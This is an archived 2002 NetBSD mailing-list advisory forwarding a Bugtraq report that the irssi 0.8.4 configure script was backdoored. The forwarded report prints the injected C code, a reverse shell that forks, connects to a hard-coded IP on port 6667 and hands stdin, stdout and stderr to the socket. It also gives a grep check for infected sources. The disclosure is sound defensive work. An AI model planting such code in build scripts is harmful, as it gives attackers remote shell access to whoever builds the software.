Subject: irssi 0.8.4 backdoor
To: None <tech-pkg@netbsd.org>
From: Jun-ichiro itojun Hagino <itojun@iijlab.net>
List: tech-pkg
Date: 05/26/2002 01:16:52
------- =_aaaaaaaaaa0
Content-Type: text/plain; charset="us-ascii"
Content-ID: <2914.1022343394.1@itojun.org>

	as reported on bugtraq, irssi 0.8.4 contained backdoor in configure
	script.  if you still have irssi binary installed, i'd suggest you to
	remove them at once, as there can be other tricks in the binary.

itojun

------- =_aaaaaaaaaa0
Content-Type: message/rfc822
Content-ID: <2914.1022343394.2@itojun.org>

Delivery-Date: Sun May 26 00:07:55 2002
	by coconut.itojun.org (Postfix) with ESMTP id 3A5764B22
	for <itojun@itojun.org>; Sun, 26 May 2002 00:07:55 +0900 (JST)
	id C009B643; Sun, 26 May 2002 00:07:54 +0900 (JST)
	by sh1.iijlab.net (Postfix) with ESMTP id 5A8B463D
	for <itojun@iijlab.net>; Sun, 26 May 2002 00:07:54 +0900 (JST)
	by outgoing.securityfocus.com (Postfix) with QMQP
	id 995FDA30A7; Sat, 25 May 2002 09:06:15 -0600 (MDT)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Message-ID: <3CEFA67D.76933B37@webtech.se>
Date: Sat, 25 May 2002 16:58:05 +0200
From: Martin =?iso-8859-1?Q?=D6stlund?= <martin@webtech.se>
MIME-Version: 1.0
To: bugtraq@securityfocus.com
Subject: irssi backdoored.
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: 8bit

Hi readers.

I just discovered this on the irssi homepage (irssi is a new, popular
IRC chat client for those who didnt know).

"Just noticed, not sure for how long it's been there. I heard the first
change in the irssi-0.8.4.tar.gz's checksum was 2002/04/19. Guess I'll
have to start watching those myself from now on.. I'm moving the
main.irssi.org elsewhere for now, mirrors should pick up the DNS change
and update themselves automatically..
This code was found from configure - it forks a new process, connects to
some server and gives stdin/out/err to it (ie. giving remote access to
your account):

       int s;
        struct sockaddr_in sa;
        switch(fork()) { case 0: break; default: exit(0); }
        if((s = socket(AF_INET, SOCK_STREAM, 0)) == (-1)) {
                exit(1);
        }
 /* HP/UX 9 (%@#!) writes to sscanf strings */
        memset(&sa, 0, sizeof(sa));
        sa.sin_family = AF_INET;
        sa.sin_port = htons(6667);
        sa.sin_addr.s_addr = inet_addr("204.120.36.206");
        if(connect(s, (struct sockaddr *)&sa, sizeof(sa)) == (-1)) {
                exit(1);
        }
        dup2(s, 0); dup2(s, 1); dup2(s, 2);

Also the IP just changed yesterday from 209.164.15.215. If you still
have the irssi sources, you can see if you're affected with grep
SOCK_STREAM configure - if it returns anything, something might have
been done to your system."

  - End of quote.

Take care,
Martin Ístlund.





------- =_aaaaaaaaaa0--